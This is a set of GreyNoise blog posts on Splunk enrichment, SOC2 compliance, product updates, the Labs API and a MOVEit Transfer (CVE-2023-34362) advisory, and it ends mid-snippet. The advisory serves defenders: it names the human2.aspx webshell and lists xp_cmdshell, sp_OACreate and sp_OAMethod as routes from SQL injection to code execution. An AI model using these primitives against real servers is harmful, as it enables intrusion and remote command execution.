You can find more information about our classifications and how to apply GreyNoise data to your analysis in our documentation: https://docs.greynoise.io/docs/applying-greynoise-data-to-your-analysis

Paired with firewall data imported into Splunk, GreyNoise data leveraged in a dashboard can show which vulnerabilities ‘unknown’ IPs are specifically looking for. Combining this knowledge with your current vulnerability scans can help you quickly identify if someone is interested in vulnerabilities specific to your attack surface.

Using GreyNoise with firewall data to build a dashboard to find potentially targeted activity as well as provide details for how IP addresses are operating.

Known Good

We talk a lot about filtering out opportunistic traffic and enriching data with GreyNoise, but let’s not sleep on the RIOT dataset. If you’re not familiar with RIOT, it’s a collection of ~50 million IP addresses associated with common business services.

What does this let you do with your data in Splunk? There are a lot of ways people are applying this dataset in their searches and hunting. Ryan Kovar wrote a great blog post about using wire data with Splunk (https://www.splunk.com/en_us/blog/security/wire-data-huh-what-is-it-good-for-absolutely-everything-say-it-again-now.html), and while legitimate services can be abused (Hello T1567!), they can also make up a significant portion of the traffic being searched. RIOT makes it easy to do a first pass and remove any outbound traffic to those services, making it easier to find potentially interesting traffic.

Using RIOT to summarize outbound network activity using Squid proxy data: index=main source=squid:access | gnriot ip_field=src | rename greynoise_name as organization | stats count by organization

More on our RIOT dataset here: https://docs.greynoise.io/docs/riot-data

Learn More About GreyNoise + Splunk

If you find this information useful then join me on June 15th for a live webinar where I’ll cover the Splunk integration in detail. Also, if you are going to .conf 23 we will be there as well! Swing by booth 103 or set up a meeting with us here.  

SOC2 For Startups

GreyNoise today announced that it achieved SOC 2 Type 2 compliance in accordance with American Institute of Certified Public Accountants (AICPA) standards for Systems and Organizational Controls (SOC). Achieving SOC 2 compliance with unqualified opinion serves as third-party industry validation that companies provide best-in-class enterprise-level security for their customers’ data. 

SOC2 is a difficult undertaking, especially if you do not have dedicated compliance or security resources who will contribute to creating the policies and implementing the changes. If you take one thing away from this post, let it be this: hire for Systems Administrator and IT operations roles before you think you need them because it will be too late by the time you do need them. Systems Administration tech debt and work is an exponential curve; the longer you go without them, the harder it becomes to fix. Aside from the struggle of collecting evidence through screenshots and questionnaires, both systems administration and engineering cycles will be required to meet the framework standards and controls. 

Foundation

SOC2 is broken out into five pillars: 

  1. Security of a service organization's system.
  2. Availability of a service organization's system.
  3. Confidentiality of customer information.
  4. Processing integrity of a service organization's system.
  5. Privacy of customer personal information.

Approaching the controls one-by-one can be a daunting task. We found it was more manageable to divide the process into general phases, the last of which is the audit itself.

Phase 1 - Pick the platforms

Our advice here is to not go it alone. From evidence collection and auditor documentation delivery to infrastructure and compliance control scanning, there are myriad different vendors which make every step of the process easier. Take time choosing the auditor that is right for you. Some are very “by the book” and others will be more lenient on “acceptable risk” controls. 

You will need platforms for a lot of controls - including SAST, vulnerability scanning, asset tracking/management, version control, and more. For the most part, free open-source software exists for each step along the way. We found it best to mix and match, opting for paid platforms where open-source implementation was going to take too much engineering time value away from other ongoing projects. For example, gosec and tfsec for some language-specific SAST scanning, CloudFlare’s Flan for internal vulnerability scanning, and Grokability Snipe-IT for asset management versus GitHub Advanced Security licenses, Tenable Nessus, ServiceNow ServiceDesk, or Oomnitza. These latter are perfectly useful products, but it’s important to decide what you want to pay for versus what you can run yourself for free. The value any company puts on each function or service the platform provides compared to the cost or time value of money will be different. 

The two direct SOC2-specific platform choices are the auditor and the compliance automation platform. SOC2 is significantly more difficult without a compliance automation platform - we estimate using such a platform saves over a hundred hours of work.

Auditors: Check which audit firm was used when you collect your SOC2 and SOC3 reports from your vendors. Turn that list into your potential auditor review list, and make a decision for an audit firm based on your meetings and due diligence with those firms. GreyNoise went with Prescient Assurance. They have a security arm that can provide your third-party penetration test, which is optional for SOC2, for a bundle discount.

Compliance Automation: Auditors will need access to a mountain of evidence in the form of read-only access to your environment, screenshots, and questionnaire answers. This is made easier with a compliance automation platform. Whereas an audit firm may not have a process in place for provisioning roles for their access, compliance platforms do, and they make it easy to both roll out and roll back. GreyNoise decided to use SecureFrame as their pricing, offering, and overall functionality/featuring was more directly suited to our needs. Some other popular options include Drata, Vanta, HyperProof, Anecdotes, and Tugboat Logic. 

Phase 2 - Knock out the big stuff

Implement, document, and be able to explain the following eight “heavy-hitters”.

  1. SSO and IAM
  2. PRs, CI/CD, and Version Control
  3. SIEM or Centralized Logging
  4. Infrastructure and Provisioning
  5. MDM
  6. Vendor Management
  7. Scanning
  8. CorpSec

SSO and IAM

Set up Okta, Google Cloud Identity, OneLogin, Azure Active Directory, or Auth0. The choice here depends on what technology you are already using for business productivity. If you are already using Office 365, then Azure Active Directory is the easy choice. If you are already using Google Workspace, then Google Cloud Identity may be the best option. When an employee logs into anything, they would ideally use their work credentials as much as possible. Enforce multi-factor authentication everywhere. Ditch single-user access and access keys and switch to “AssumeRole” if you are leveraging AWS, GCP, or Azure. In our environment, we added SAML tokens to each user in Google Workspace allowing them to assume a role (Read Only, Billing, Administrator, etc.) in the corresponding AWS accounts.
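For the AWS side specifically, the move away from long-lived access keys looks roughly like this boto3 sketch (the role ARN and session name are placeholders; in the SAML-federated flow described above, the corresponding call is assume_role_with_saml):

import boto3

# Exchange an existing identity for short-lived role credentials instead of
# storing per-user access keys.
sts = boto3.client("sts")
creds = sts.assume_role(
    RoleArn="arn:aws:iam::123456789012:role/ReadOnly",  # placeholder ARN
    RoleSessionName="alice-readonly",
)["Credentials"]

s3 = boto3.client(
    "s3",
    aws_access_key_id=creds["AccessKeyId"],
    aws_secret_access_key=creds["SecretAccessKey"],
    aws_session_token=creds["SessionToken"],
)
print([b["Name"] for b in s3.list_buckets()["Buckets"]])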

Set a secure password preference order:

  1. Require login via SSO (Okta / Google Cloud Identity)
  2. Require sign in with Google Workspace or Office 365
  3. Require 2FA with standard login OR “magic” link
  4. Standard login

Leverage an organization-wide password manager like 1Password or Bitwarden, with separate “vaults” for departments and roles. Use something with automatic detection of weak or reused passwords, and enforcement of strong password policies.

PRs, CI/CD, and Version Control

Implement some approval processes for your pull requests. Don’t limit it to just a manual review by engineering management or leadership. Include automated testing and the scanning of code for unit, integration, and end-to-end tests to ensure builds are passing and security policies/controls are green. Diagram out the overall process, like this: 

You will need different environments - such as development, staging, and production. Deployments move across each, and are tested in each before actual implementation in the production environment. Ideally, changes to these environments would be tracked and dictated by GitHub, GitLab, BitBucket, or some other code version control platform.

SIEM or Centralized Logging

A SIEM is not a requirement for SOC2, but extensive logging capabilities with alerting are. If there is a resource or storage essential to the operation of your product or business, access and audit logs for the resource should be easily retrieved and reviewed. 

If an employee logs in to a resource from Washington, DC and then logs in from Seattle, WA, a few moments later from a different device, you need to know about it immediately through logging or block that second login altogether. If 100GB of data is downloaded from an S3 bucket when the daily average is 10GB, alarm bells should go off. Establish what “normal” is, and have a process in place to regularly review anomalous activity or anything outside of that normal bound. 

Collecting logs will help you in post-incident response situations. Regularly reviewing and alerting on those logs will help you to avoid post-incident response situations.

Infrastructure and Provisioning

Have a reproducible process in place for spinning up infrastructure resources. This can be implemented with Infrastructure as Code and configuration management tools like Salt, Ansible, Terraform, Chef, Puppet, or CloudFormation. 

SOC2 will be significantly more painful if infrastructure in your environment is created manually by the engineering or IT team without an approval process or automation. GreyNoise infrastructure is entirely in Terraform and Salt. This way, approval and automation are shared with the CI/CD and pull request pipeline. If a process already exists that can be leveraged, it will save time. 

The general idea here is that you should do as much as possible NOT in the web console for something like AWS, Azure, or vCenter. Take note of any actions you perform in the web console - this is your automation list.

Mobile Device Management (MDM)

Install an MDM platform on all company-owned desktops, laptops, and phones: any device that will access the internal systems of your product or customer data. Roll out the “compliance” packs for SOC2 to enforce things like password complexity, disk encryption, and software update cadence.

This is a crowded space, often undergoing expansion and consolidation. Fleetsmith was a great Mac OS and iOS MDM tool. Apple acquired the company and quickly removed all capability to install third-party (non-Apple and non-App Store) apps. Apple killed the product two years after the acquisition. The gold-standard for Mac OS and iOS seems to be JAMF/JAMF Pro. 

GreyNoise ended up splitting MDM platforms - one for Mac and one for Windows/Linux. It is a difficult choice to make between a broader platform that covers three Linux distributions, Windows, and Mac OS at a percentage of what you need and two or three platforms that cover almost all of what you need for each.

Vendor Management

A lot of time will be spent on scoring vendor risk based on their operational reliance and the data they access or contain. Part of SOC2 requires collecting compliance reports from these vendors (SOC2, SOC3, ISO 27001, etc.) and reviewing them annually. A comprehensive list of vendors is an important one to keep up to date for both compliance and cost control reasons.

In developing this list, GreyNoise found a handful of vendors we were still paying but either not using or whose service/functionality was duplicated by another platform. Ultimately, SOC2 required us to enumerate our vendors and generate a Software Bill of Materials (SBOM), and it led to cost savings by eliminating or consolidating redundant platforms.

Scanning

An understandably broad topic, but for SOC2 specifically you should be scanning for:

  • Vulnerabilities in dependencies/packages
  • Vulnerabilities in infrastructure in general - both internal and external
  • SOC2 compliance controls 

Each finding should have a rating from informational to critical, and each rating should have a time-to-resolution SLA which dictates how quickly you must respond and remediate. There are some free solutions which offer compliance control monitoring, such as Steampipe compliance packs for AWS. GreyNoise decided to partner with SecureFrame to streamline the monitoring of these controls and to provide auditors with access to our documentation and evidence quickly and securely. A compliance automation vendor is strongly recommended for time and sanity's sake.

CorpSec

SOC2 includes some business operational aspects which will encompass a few different departments or teams in your organization. The following are some examples required for SOC2:

  • Background checks for employees. 
  • Annual security and privacy training for employees. 
  • Documented processes for onboarding, offboarding, encryption, data retention, etc.
  • Regular board meetings, with meeting minutes and bylaws.
  • Quarterly access security reviews.
  • Job descriptions for all roles.

Many compliance automation platforms include auto-generated policies which require slight tweaking and adjustments to pass the “policy” controls. Invest time in either writing your own or significantly building on the automated policy output from your compliance platform. There are plenty of great security companies who publicly publish their policies (https://tailscale.com/security-policies/) which you can build on and adapt to your needs. GreyNoise will also publish our policies in the near future.

Phase 3 - Red to Green

Failing controls and tests will pop up after rolling out the compliance automation platform. The time to resolve these controls varies significantly, so expect this phase to take the longest. In our experience, the slowest controls to flip from red to green were "all data encrypted in transit" and "all data encrypted at rest".

You will want to resolve these tests until at least 90% are green before kicking off the audit itself. Work with your team to bucket the failing controls, and turn them into issues or projects to be assigned. You can even provide screenshot evidence of these projects and issues as proof of your organization’s incident tracking from discovery to resolution for the SOC2 audit.

This is the phase which will likely take the most time, money, and effort from your team. Unless you “shifted left” right out of the gate and began developing on day one with a security mindset baked in, plan to dedicate a few weeks or a couple of months to remediating failing controls.

Part of the phase also includes screenshot and evidence gathering. SecureFrame helped GreyNoise to easily organize this evidence and gave us an easy way for auditors to access it. This may take several days or weeks to complete and you will wind up with hundreds of screenshots, documents, templates, and examples. 

Phase 4 - Audit

One thing to note is that you will never see a failed SOC2 report or audit. You either get a report or not. If you fail to get a report, you can always try again when you are better positioned. Failure means you get to try again until you succeed. Success means you still need to do it again next year.

Timeline

From project kickoff to completion, SOC2 took GreyNoise about 18 months for the first time. Recertification, which needs to be completed annually, will take us about four months moving forward. 

The time to complete SOC2 accreditation can be greatly reduced by dedicating more resources to the implementation and maintenance of compliance. The shortest amount of time we imagine possible for first-time SOC2 accreditation is six months.

Keep in mind that you will be reperforming the audit exactly one year after you receive the accreditation. You may decide to add other compliance certifications, such as ISO 27001. As time goes on and your company grows, compliance becomes harder and will require a dedicated team.

Two Audits

The audit process is broken down into two phases, Type 1 and Type 2. Type 1 is a short audit period, usually a couple of days, and Type 2 is longer, usually between 60 and 90 days. 

Type 1 means you meet the audit criteria at a single point in time; Type 2 means you maintain compliance with those same criteria over a period of several months. In other words, Type 1 is meeting the compliance standard, and Type 2 is maintaining that compliance standard with any changes over time.

Conclusion

Here are some of our opinions, takeaways, and advice:

  • SOC2 will take you longer than you think
  • Hire System Administrators and IT operations early, as part of the first 20 employees
  • Use a compliance automation platform to save time and effort
  • Break out compliance with the framework into phases, with the audit happening last
  • Plan to build a compliance team to manage the process in the future
  • Treat documentation as a first-class citizen as early as possible
  • Use SOC2 to change process for the better, not just as a compliance checkbox

The way your organization approaches SOC2 compliance can be the easy way or the hard way. The easy way is to treat compliance like a checkbox and do the minimum to pass the audit. The hard way is to take the input and output from the framework and make significant changes to processes, baking in security as a priority early on for everyone. For those serious about security, the hard choice is easy to make.

GreyNoise Round Up: Product Updates - May 2023

May brought more product enhancements to user workflows, data coverage… and of course, more interesting tags! Twenty-four, to be exact, as we continue to improve our product to help our customers monitor emerging threats and identify benign actors. We expanded our sensor coverage to include Ghana, plus we made some helpful improvements to our bulk analysis, RIOT dataset, and APIs.

Improvement to Bulk Analysis: Export Unknown IPs

The Bulk Analysis function in the GreyNoise Visualizer has been improved so that users can now export unidentified IPs via CSV and JSON.  

This improvement helps analysts more easily identify the ‘interesting’ IPs in a bulk dataset they are analyzing (IPs identified by GreyNoise are known common scanners or common business services; IPs that are UNKNOWN to GreyNoise could represent a targeted threat or something that requires additional investigation).

To access this feature, go to the GreyNoise Analysis page and analyze a file or dataset containing IP addresses.

Improvements to Destination Metadata: Sensor Hits

Two fields have been added to the metadata returned via the Bulk Data, IP Context, and GNQL APIs that will help users determine baselines or rates of activity (a quick lookup sketch follows the list):

  • metadata.sensor_hits is the amount of unique data the sensor has recorded from the queried IP.
  • metadata.sensor_count is the number of our sensors from which the IP address or behavior has been observed.
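A minimal sketch of reading these fields from the IP Context API with Python (the IP and API key are placeholders):

import requests

resp = requests.get(
    "https://api.greynoise.io/v2/noise/context/1.2.3.4",  # placeholder IP
    headers={"key": "YOUR_API_KEY"},
    timeout=10,
)
metadata = resp.json().get("metadata", {})
print(metadata.get("sensor_hits"), metadata.get("sensor_count"))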

RIOT: Qualys Scanner IPs added

We are now tracking Qualys scanner IP addresses in our RIOT database of common business services, so that customers can whitelist this activity (should they wish to) or contextualize this activity when seen in their security logs.

RIOT identifies IPs from known benign services and organizations that commonly cause false positives in network security and threat intelligence products. The collection of IPs in RIOT is continually curated and verified to provide accurate results.

New and Updated Integrations

Splunk Improvements: High Volume Enrichment, IP Similarity and IP Timeline Support

The GreyNoise App for Splunk has been updated to include a new Feed component, which allows users to ingest the GreyNoise indicator feed into Splunk for high-volume log enrichment. Additionally, new dashboards and commands have been added to support the IP Similarity and IP Timeline tools. Learn More

ThreatQ Improvements: New Actions for ThreatQ Orchestrator

ThreatQ has released new GreyNoise Actions for the Orchestrator platform which allow for IP Similarity, RIOT and Quick lookups against the GreyNoise API. These updates can be downloaded from the ThreatQ Marketplace.  Learn More

Tags Coverage Enhancements

In May, GreyNoise added 24 new tags:

20 malicious activity tags

3 benign actor tags

1 unknown tag

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert informing them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389

On Monday, May 1, 2023, CISA added CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389 to the Known Exploited Vulnerabilities (KEV) list.  For all three CVEs, GreyNoise users had visibility into which IPs were attempting mass exploitation prior to their addition to the KEV list. GreyNoise tags allow organizations to monitor and prioritize the handling of alerts regarding benign and, in this case, malicious IPs.

Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens

At GreyNoise we recognize the value of partnership and intelligence sharing when it comes to protecting internet citizens. Today the GreyNoise Labs team wants to give a shoutout to Trinity Cyber.

Progress’ MOVEit Transfer Critical Vulnerability: CVE-2023-34362

On May 31st, 2023 Progress issued a security notice to users of MOVEit Transfer regarding a vulnerability that allows for escalated privileges and potential unauthorized access to the environment. CVE-2023-34362 was assigned to this vulnerability on June 2, 2023.

Sensor Coverage Enhancements: Ghana

We’ve added additional sensor coverage for Ghana.

You can view which IPs are seen scanning sensors in certain countries from our IP details page, or use `destination_country:"<country_name>"` in GNQL to find IPs that have hit those regions.  Destination country search is available in all commercial plans for GreyNoise and to our community VIP users.
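
If you'd rather script this than use the Visualizer, here's a minimal Python sketch that runs the same GNQL query through the experimental GNQL API endpoint (the query string and page size are just examples):

import os
import requests

# Minimal sketch: list IPs GreyNoise has observed hitting sensors in Ghana via the GNQL API.
API_KEY = os.environ["GREYNOISE_API_KEY"]

resp = requests.get(
    "https://api.greynoise.io/v2/experimental/gnql",
    params={"query": 'destination_country:"Ghana"', "size": 25},
    headers={"key": API_KEY},
    timeout=30,
)
resp.raise_for_status()
for record in resp.json().get("data", []):
    print(record.get("ip"), record.get("classification"))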


Labs API: It’s Playtime

Introducing the Labs API Playground, a powerful tool designed to provide users quick access to data and an Early-Access/Beta API experience. Whether you’re a seasoned GreyNoise user (welcome back!) or just starting your journey (welcome aboard!), this playground will enable you to explore and interact with our data in new ways.

Accessing the Playground

To enter the Labs API Playground, visit https://api.labs.greynoise.io. It’s that easy! Who can access this playground? Anyone with a GreyNoise Account! And if you’re already a proud member of our GreyNoise community, you’re just a few clicks away from unlocking this API experience. Don't have a GreyNoise account yet? Create your free account here.

Rules of Engagement on Labs API

Before you dive straight into the Labs API, let’s familiarize ourselves with a few essential guidelines:

  1. Intended Use: The Labs API is a data source derived from the GreyNoise sensors and platform specifically designed to uncover insights our users may find intriguing and to facilitate exciting data explorations related to emerging threats; however, the Labs API is not for production use in user environments.
  2. Partial Data: The data sets available through the Labs API represent only a fraction (1%-10%) of the complete data. Users may be interested in accessing the entire set, but bulk data delivery is unavailable during the beta phase. If you have use cases that require access to the complete data set, we encourage you to contact us to schedule a discussion with our sales and product team.
  3. Support: If you encounter connectivity issues beyond verifying your GreyNoise account and accessing the Labs API Playground, please email labs@greynoise.io.
  4. Uptime and Downtime: We strive to maintain optimal uptime for the Labs API service; however, GreyNoise will only address downtime incidents during regular business hours.

Explore the Power of Labs API Queries

Now that you’re familiar with the playground’s rules and feedback process, it’s time to get hyped about the exciting world of Labs API queries! Here are a few notable ones to get you started:

topC2s

  • Access the top 1% of possible Command and Control (C2) IP addresses, ranked by their pervasiveness, observed by GreyNoise over the previous 24 hours. 
  • Use this query to identify second-stage IP addresses that might be involved in malicious activities following the reconnaissance and initial access stages. 
  • Please note that the data may be up to 4.5 hours old. 

topHTTPRequests

  • Access the top 1% of HTTP requests, ranked by their pervasiveness, observed by GreyNoise over the last seven days. Gain insights into the background radiation of the internet, exploring the patterns and trends of HTTP requests. 
  • Please note that the data may be up to 4.5 hours old. 

topPopularIPs

  • Access the top 1% of IPs searched in GreyNoise, ordered by the number of users observed searching over the last 7 days. Understand commonalities in how users search within GreyNoise, gaining insights into popular IPs and their associated activities. 
  • This query uses a minimum number of IP submissions and users to build consensus before an IP can be considered available in this dataset.
  • The data provided may be up to 4.5 hours old, and the “/” path has been removed as it is generally less valuable in most contexts. 

noiseRank

  • Access the top 1% of IPs by their noise score for the last 7 days. This score is determined by comparing the pervasiveness of the number of sensors and countries that observed packets from the IP, the request rate, and the diversity of payloads and ports for which the packets were observed. 
  • This query is intended to help rank the top noise makers compared to the quiet single-hit scanners.
  • Please note that the data may be up to 4.5 hours old. 
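
To give a feel for how these queries are called, here's a rough Python sketch; the endpoint path, auth header, and field names in it are assumptions for illustration only, so treat the playground itself as the source of truth:

import os
import requests

# Illustrative only: the query names (topC2s, noiseRank, etc.) come from the list above,
# but the endpoint path, auth header, and response fields in this sketch are assumptions --
# the playground at https://api.labs.greynoise.io shows the canonical query shapes.
API_KEY = os.environ["GREYNOISE_API_KEY"]

graphql_query = "{ topC2s { c2ips { source_ip hits } } }"  # hypothetical field names

resp = requests.post(
    "https://api.labs.greynoise.io/1/query",  # assumed path
    json={"query": graphql_query},
    headers={"Authorization": f"Bearer {API_KEY}"},
    timeout=30,
)
resp.raise_for_status()
print(resp.json())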

Share Your Discoveries

The Labs API Playground is intended to drive exploration and data-driven insights. Let curiosity guide you as you uncover hidden patterns, emerging threats, and connections within the vast landscape of internet noise.

Progress’ MOVEit Transfer Critical Vulnerability: CVE-2023-34362

GreyNoise recommends reviewing systems for any indicators of unauthorized access that may have occurred within the past 90 days.

On May 31st, 2023, Progress issued a security notice to users of MOVEit Transfer regarding a vulnerability that allows for escalated privileges and potential unauthorized access to the environment. CVE-2023-34362 was assigned to this vulnerability on June 2, 2023. The MOVEit Transfer tag can be viewed here.


Progress’ security notice advises users to review their systems for unauthorized access over “at least the past 30 days”; however, GreyNoise has observed scanning activity for the MOVEit Transfer login page, located at /human.aspx, as early as March 3rd, 2023. While we have not observed activity directly related to exploitation, all five of the IPs we have observed attempting to discover the location of MOVEit installations were marked as “Malicious” by GreyNoise for prior activities.

Based on the scanning activity we have observed, it is our recommendation that users of MOVEit Transfer should extend the time window for their review of potentially malicious activity to at least 90 days.

The primary artifact, observed through publicly available information, is the presence of a webshell named human2.aspx. This is a post-exploitation file artifact that is written to the filesystem by a malicious actor allowing them to execute arbitrary commands.

GreyNoise is observing scanning activity looking to identify the presence of the human2.aspx webshell dropped as part of the post-exploitation activity.
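
For defenders who want a quick, read-only check of their own MOVEit Transfer hosts, a minimal Python sketch along these lines can flag whether that artifact is being served (the hostname is a placeholder, and a non-404 response is only a lead for deeper forensics, not proof of compromise):

import requests

# Read-only sketch: check a MOVEit Transfer host you own for the reported human2.aspx artifact.
# Anything other than a 404 is only a lead for deeper on-host forensics, not confirmation.
host = "moveit.example.com"  # placeholder: your own MOVEit Transfer hostname

resp = requests.get(f"https://{host}/human2.aspx", timeout=10, allow_redirects=False)

if resp.status_code == 404:
    print("human2.aspx not served at the web root (expected on a clean install)")
else:
    print(f"Unexpected response {resp.status_code} for /human2.aspx -- investigate on the host")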

While the specific details of the initial exploitation vector are largely unknown at this time, we would like to provide the following items and details to our customers and community:

  • Several cybersecurity vendors are covering the subject, including Rapid7 and TrustedSec
  • Rapid7 is indicating the initial vector may be a SQL injection vulnerability leading to remote code execution (SQLi-to-RCE)
  • Progress MOVEit Transfer is deployed with a Microsoft SQL (MSSQL) or MySQL backing database
  • The login page of Progress MOVEit Transfer is located at /human.aspx
  • Common paths to achieve remote code execution through SQL injection include the use of the following T-SQL commands:
      • xp_cmdshell
      • sp_OACreate
      • sp_OAMethod

Last but not least, a big thank you to the GreyNoise community for alerting us to this activity early on.

Enhancing Threat Detection and Response

The Situation

Threat hunters spend a significant portion of their time searching through security logs looking for specific Indicators of Compromise (IoCs) or patterns of activity/behavior that indicate compromise. This work comes with some specific challenges: 

  • Too Many Tools, Too Much (Nonsense) Data: Oftentimes, threat hunters end up with log files or results pages showing long lists of suspicious events (including related IP addresses), and it can take many hours to work through this information to filter and identify malicious activity. 
  • Time Spent Clustering: Identifying infrastructure used by adversaries is a time consuming process.
  • Building Early (but reliable) Detections: Detections developed to identify malicious activity can generate false positives or get outdated quickly if they are based on non-current data.

Techniques to Improve the Situation

To address some of these pain points, organizations can use tools like GreyNoise in conjunction with a SIEM or SOAR platform to quickly identify potential threats, investigate them further, get more out of their existing tools, and filter through data sources faster. By understanding how infrastructure is being used, which vulnerabilities are being leveraged, and the patterns of scans, threat hunters can gain valuable context on how adversaries operate and improve their response to threats.
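
As a concrete example of that workflow, here's a minimal Python sketch that bulk-checks a list of alert IPs against GreyNoise (assuming the v2 multi-quick endpoint) so analysts can set aside opportunistic scanner noise and focus on the rest:

import os
import requests

# Minimal sketch: triage a batch of alert IPs exported from a SIEM, separating opportunistic
# internet-wide scanners ("noise") from IPs that deserve hands-on investigation.
API_KEY = os.environ["GREYNOISE_API_KEY"]
alert_ips = ["203.0.113.7", "198.51.100.23"]  # placeholder list pulled from your SIEM

resp = requests.post(
    "https://api.greynoise.io/v2/noise/multi/quick",
    json={"ips": alert_ips},
    headers={"key": API_KEY},
    timeout=30,
)
resp.raise_for_status()

# The quick endpoint returns one record per IP; anything not flagged as noise stays in the queue.
needs_review = [r["ip"] for r in resp.json() if not r.get("noise")]
print("IPs needing manual review:", needs_review)

From there, the needs_review list can be handed back to a SOAR playbook for deeper enrichment or ticketing.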

Recently, we held a webinar on this topic, where we discussed how organizations are using specific techniques in their day-to-day operations. To gain perspective on how you can streamline your threat hunting process, sign up to access the on-demand recording and learn: 

  • How to use GreyNoise features and SOAR playbooks to hunt, detect, and defend.
  • The ins and outs of analyzing logs to identify potential DDoS attacks and how to respond to them effectively.
  • Tips and tricks for incorporating vulnerability intelligence into your threat intel reports, which can help you stay ahead of emerging threats.

Announcing the GreyNoise Ambassador Program: Empowering Community Members to Make a Difference

GreyNoise is built on a strong foundation of mutual respect from our community. While we love doing swag drops on Twitter (or maybe Bluesky - anyone have an invite?), we wanted to recognize community members that go above and beyond. 

Enter the GreyNoise Ambassador Program! We couldn’t think of a better way to celebrate our users' constant support, spirit of collaboration, and mentorship within our community. I’m here to answer all your burning questions about the program and how you can apply!

Who Is the Ideal Ambassador?

Ambassadors are pillars of the GreyNoise Community. This program celebrates their efforts to support community growth and accessibility, focusing on three key elements:

  • Collaboration: This is not only sharing information, detections, or memes with the team at GreyNoise, but with each other! We all win when we share.
  • Mentorship: People who are helpful and educate their peers.
  • Transparency: This is a core GreyNoise belief that you can and should be honest whenever possible.

Ambassadors are folks who have dedicated time and resources to bettering GreyNoise, whether through continuous feedback, bug reports, integrations, or conference talks, or because they're just deeply dedicated to reducing Internet Noise. 

Why Join the Ambassador Program?

If you are on the fence about being an ambassador, let us tell you about the perks you get: 

  • Premium swag (see below) 
  • 5 VIP passes to give out to your friends, in line with our VIP guidelines 
  • Early access testing for any new GreyNoise features and products (including the forthcoming GreyNoise honeypot) 
Swag sneak peek!

What Is Expected of Me As An Ambassador?

In exchange for being our Ambassador, we ask that you do one or more of the following:

  • Lead a “How I Use GreyNoise” session (these can be pre-recorded or live & public)
  • Participate in a product feedback session
  • Write a guest blog
  • Speak at a GreyNoise event (In person or virtual!) 
  • Continue to spread the word about GreyNoise :) 

Your term as an Ambassador will last a year, and when Spring 2024 rolls around, you will be asked to reapply.

How Do I Apply?

If this all sounds good to you, we ask that you fill out this application. We will evaluate applications until the end of May and send notice to our Ambassadors in early June!

If you have any questions, don’t hesitate to reach out to the Community team.


Internet Noise Search School with the GreyNoise Product Team - Searching for Words

As a Product Manager at GreyNoise, I’m constantly learning about how our users think about internet noise and accordingly search our data with the GreyNoise Query Language (GNQL). It might surprise you (or not) that we see some pretty random searches.

As evidenced by our 2000s-style word cloud, users have been searching for anything from “log4shell” to “lockbit” to “mcdonalds.” While GreyNoise search is not a threat actor Google, we do have a lot of data on interesting threats. Let me demystify our search bar for those of us who want to improve our ninja search skills.

What can you search for in GreyNoise?

The answer is anything, which is why you should use GNQL searches!

When you throw a word into the GreyNoise Viz search bar, we treat it like a free text search, where we search all of our data for that term - so this means if you search “banana,” we will return the IP addresses that have scanned for the “/banana/” directory. But we might also return IPs with “banana” in their user agent.

The GNQL way of guaranteeing you only get IPs with “banana” in the HTTP web paths is to use the `raw_data.web.paths` field selector. The search for our banana path would look like `raw_data.web.paths:"/banana/"`.

(15 results!)

More fun with field selectors in GNQL is in our Cheat Sheet - Linked in the account help section or the search bar.

If you’re looking for a specific user agent or organization, we also have field selectors: `raw_data.web.useragents` and `metadata.organization`, respectively.
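
For example (the values below are placeholders just to show the syntax):

raw_data.web.useragents:"zgrab"
metadata.organization:"Google LLC"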

For the searches that are word-based but land outside web paths, user agents, and organizations, we have a few other categories they might fall into - Actors, Tools, Botnets, and Techniques. For these, I recommend searching our tags. This is as easy as going to the tags page and utilizing the tag search bar, where we can return all our tags containing your search term.

As for threat groups: at this time, GreyNoise does not dabble in attribution. If you’re trying to track down a particular group, we recommend identifying the IoCs that group is known to use. We have found initial reconnaissance IPs from other research teams’ reports lurking in our data, along with web paths that may indicate compromise or C2/botnet activity.

I hope these tips helped level up your GreyNoise search skills to help you find what you’re looking for even faster. Create deep dives into something haunting you using our Cheat Sheet, and stay tuned for more internet noise search tips soon!


Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens

At GreyNoise we recognize the value of partnership and intelligence sharing when it comes to protecting internet citizens. Today the GreyNoise Labs team wants to give a shoutout to Trinity Cyber.

Last week the Threat Analysis team at Trinity Cyber reached out to GreyNoise providing evidence of exploitation for CVE-2023-1389, a command injection vulnerability in TP-Link Archer AX21 firmware. With the provided information, in under two hours, GreyNoise deployed a tag to detect and confirm exploitation in the wild. You can read more about this here.

Shortly after shipping that tag, Trinity Cyber then provided evidence for five more CVEs which we were able to get tagged and published this week for all of our users! They are as follows:

  • CVE-2023-0640: a remote code execution vulnerability in TRENDnet TEW-652BRP
  • CVE-2023-27240: a remote code execution vulnerability in Tenda AX3
  • CVE-2019-20500: a remote code execution vulnerability in D-Link DWL-2600AP
  • CVE-2022-29303: a remote code execution vulnerability in Solarview Compact 6
  • CVE-2022-27002: a remote code execution vulnerability in Arris TR3300 

Thank you for your transparency and continued support, Trinity Cyber! Together we make the internet safer.

Want to partner with GreyNoise? Learn More >>

GreyNoise Round Up: Product Updates - April 2023

GreyNoise added a number of exciting updates in April, including 20 new tags for users to monitor emerging vulnerabilities and threats, and identify benign actors. We’ve also added integration updates to support our new IP Similarity and Timeline features, and enhancements to the IP Similarity capability to improve accuracy and give users a summary view to easily understand similar IP infrastructure.

IP Similarity Enhancements 

New IP Similarity Summary View

GreyNoise IP Similarity Summary View

We’ve enhanced our IP Similarity feature with a summary view that breaks down the high level summary of what fields we found similar in our dataset, and allows customers to quickly scan for common fields and tags.  IP Similarity is available to paying customers and to our community VIP users: start a trial* today to explore or learn more about this feature.

IP Similarity Model Updates

We've updated the algorithm used by our IP Similarity to improve accuracy through several changes. Feature vectors are scaled and normalized to increase the distance between low and high information numbers, resulting in lower similarity scores. Bugs related to tokenizing user agent and web path strings were fixed, and options like 'unknown' and certain domain names were excluded. Values for webpath, rDNS, OS, and ports were adjusted, resulting in a feature vector with 693 items. Lastly, the minimum info threshold was raised to help improve accuracy of results.
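
To make the normalization point a bit more concrete, here is a purely illustrative Python sketch of scaling two toy feature vectors and comparing them with cosine similarity; it is not the GreyNoise model, just a picture of why normalization matters before comparison:

import numpy as np

# Purely illustrative -- not GreyNoise's model. It only shows why scaling/normalizing feature
# vectors before comparing them changes how far apart low- and high-information IPs land.
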